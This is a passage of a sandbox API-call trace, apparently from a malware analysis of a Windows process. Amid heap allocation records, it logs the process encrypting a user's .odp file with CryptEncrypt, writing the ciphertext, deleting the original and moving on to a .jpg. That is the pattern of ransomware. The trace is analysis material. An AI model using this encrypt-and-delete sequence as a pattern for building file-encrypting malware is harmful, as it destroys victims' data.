[0131.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb060 [0131.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0131.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0131.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0131.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0131.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0131.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0131.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0131.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0131.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0131.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0131.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0131.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0131.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0131.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0131.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0131.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0131.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0131.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0131.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0131.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0131.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0131.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0131.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0131.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0131.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0131.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0131.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0131.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0131.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0131.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0131.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0131.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0131.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0131.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0131.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0131.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0131.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0131.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0131.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0131.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0131.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0131.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0131.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0131.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0131.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0131.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0131.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0131.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0131.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0131.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0131.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0131.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0131.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0131.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0131.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0131.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0131.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0131.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0131.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0131.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0131.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0131.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0131.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0131.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0131.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0131.858] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0131.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0131.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0131.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0131.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796f08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0131.858] CryptGetKeyParam (in: hKey=0x41ac280, dwParam=0x7, pbData=0x43e2930, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e2930*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0131.858] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0131.858] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0131.859] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0131.859] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.859] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0131.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb180, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0131.859] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x941f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x9420) returned 1 [0131.859] CharLowerBuffW (in: lpsz="byte[37921]", cchLength=0xb | out: lpsz="byte[37921]") returned 0xb [0131.859] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.859] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0131.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb498, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0131.859] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49c5c88*, pdwDataLen=0x144e538*=0x941f, dwBufLen=0x9420 | out: pbData=0x49c5c88*, pdwDataLen=0x144e538*=0x9420) returned 1 [0131.905] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0131.905] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0131.905] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0131.905] WriteFile (in: hFile=0x2a0, lpBuffer=0x49b3438*, nNumberOfBytesToWrite=0x9420, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x49b3438*, lpNumberOfBytesWritten=0x144ef3c*=0x9420, lpOverlapped=0x0) returned 1 [0131.907] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0131.907] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.907] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0131.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cafd0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0131.907] CryptDestroyKey (hKey=0x41ac280) returned 1 [0131.907] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0131.907] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0131.907] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0131.907] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0131.907] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0131.907] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0131.907] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.907] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0131.908] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0131.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0131.908] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0131.908] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.908] FreeLibrary (hLibModule=0x756e0000) returned 1 [0131.908] CloseHandle (hObject=0x258) returned 1 [0131.908] CloseHandle (hObject=0x2a0) returned 1 [0131.910] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\dcplTjPjl4z2QV.odp", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\dcplTjPjl4z2QV.odp", lpFilePart=0x0) returned 0x37 [0131.910] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\dcplTjPjl4z2QV.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\dcpltjpjl4z2qv.odp")) returned 0x20 [0131.910] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\dcplTjPjl4z2QV.odp", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb24f7de0, ftCreationTime.dwHighDateTime=0x1d5ea8d, ftLastAccessTime.dwLowDateTime=0xbb1d0940, ftLastAccessTime.dwHighDateTime=0x1d5ee59, ftLastWriteTime.dwLowDateTime=0xbb1d0940, ftLastWriteTime.dwHighDateTime=0x1d5ee59, nFileSizeHigh=0x0, nFileSizeLow=0x941f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="dcplTjPjl4z2QV.odp", cAlternateFileName="DCPLTJ~1.ODP")) returned 0x41ac2c0 [0131.910] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\dcplTjPjl4z2QV.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\dcpltjpjl4z2qv.odp")) returned 1 [0131.954] FindNextFileW (in: hFindFile=0x41ac2c0, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb24f7de0, ftCreationTime.dwHighDateTime=0x1d5ea8d, ftLastAccessTime.dwLowDateTime=0xbb1d0940, ftLastAccessTime.dwHighDateTime=0x1d5ee59, ftLastWriteTime.dwLowDateTime=0xbb1d0940, ftLastWriteTime.dwHighDateTime=0x1d5ee59, nFileSizeHigh=0x0, nFileSizeLow=0x941f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="dcplTjPjl4z2QV.odp", cAlternateFileName="DCPLTJ~1.ODP")) returned 0 [0131.955] FindClose (in: hFindFile=0x41ac2c0 | out: hFindFile=0x41ac2c0) returned 1 [0131.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0131.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0131.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0131.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0131.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d8c0 | out: hHeap=0x1780000) returned 1 [0131.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0131.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0131.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0131.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0131.955] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0131.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac100 | out: hHeap=0x1780000) returned 1 [0131.955] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0131.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0131.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0131.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0131.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0131.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0131.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0131.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0131.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0131.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0131.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5a98 | out: hHeap=0x1780000) returned 1 [0131.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0131.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0131.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0131.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0131.956] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0131.956] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0131.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0131.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0131.956] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0131.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0131.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0131.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0131.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0131.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0131.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0131.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0131.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0131.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0131.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0131.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0131.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0131.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a608 [0131.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0131.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0131.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0131.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0131.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf0) returned 0x43150f0 [0131.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a608 | out: hHeap=0x1780000) returned 1 [0131.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0131.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0131.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0131.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0131.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0131.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0131.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0131.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0131.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0131.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0131.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0131.957] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0131.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0131.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0131.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0131.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0131.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0131.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0131.957] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0131.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0131.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0131.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0131.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0131.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0131.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0131.958] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\g6f-14R3g3sZGYbIp.jpg", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x918ea820, ftCreationTime.dwHighDateTime=0x1d5e45b, ftLastAccessTime.dwLowDateTime=0x4b543b90, ftLastAccessTime.dwHighDateTime=0x1d5ef19, ftLastWriteTime.dwLowDateTime=0x4b543b90, ftLastWriteTime.dwHighDateTime=0x1d5ef19, nFileSizeHigh=0x0, nFileSizeLow=0x17606, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="g6f-14R3g3sZGYbIp.jpg", cAlternateFileName="G6F-14~1.JPG")) returned 0x41ac740 [0131.958] FindClose (in: hFindFile=0x41ac740 | out: hFindFile=0x41ac740) returned 1 [0131.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0131.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0131.958] HeapFree 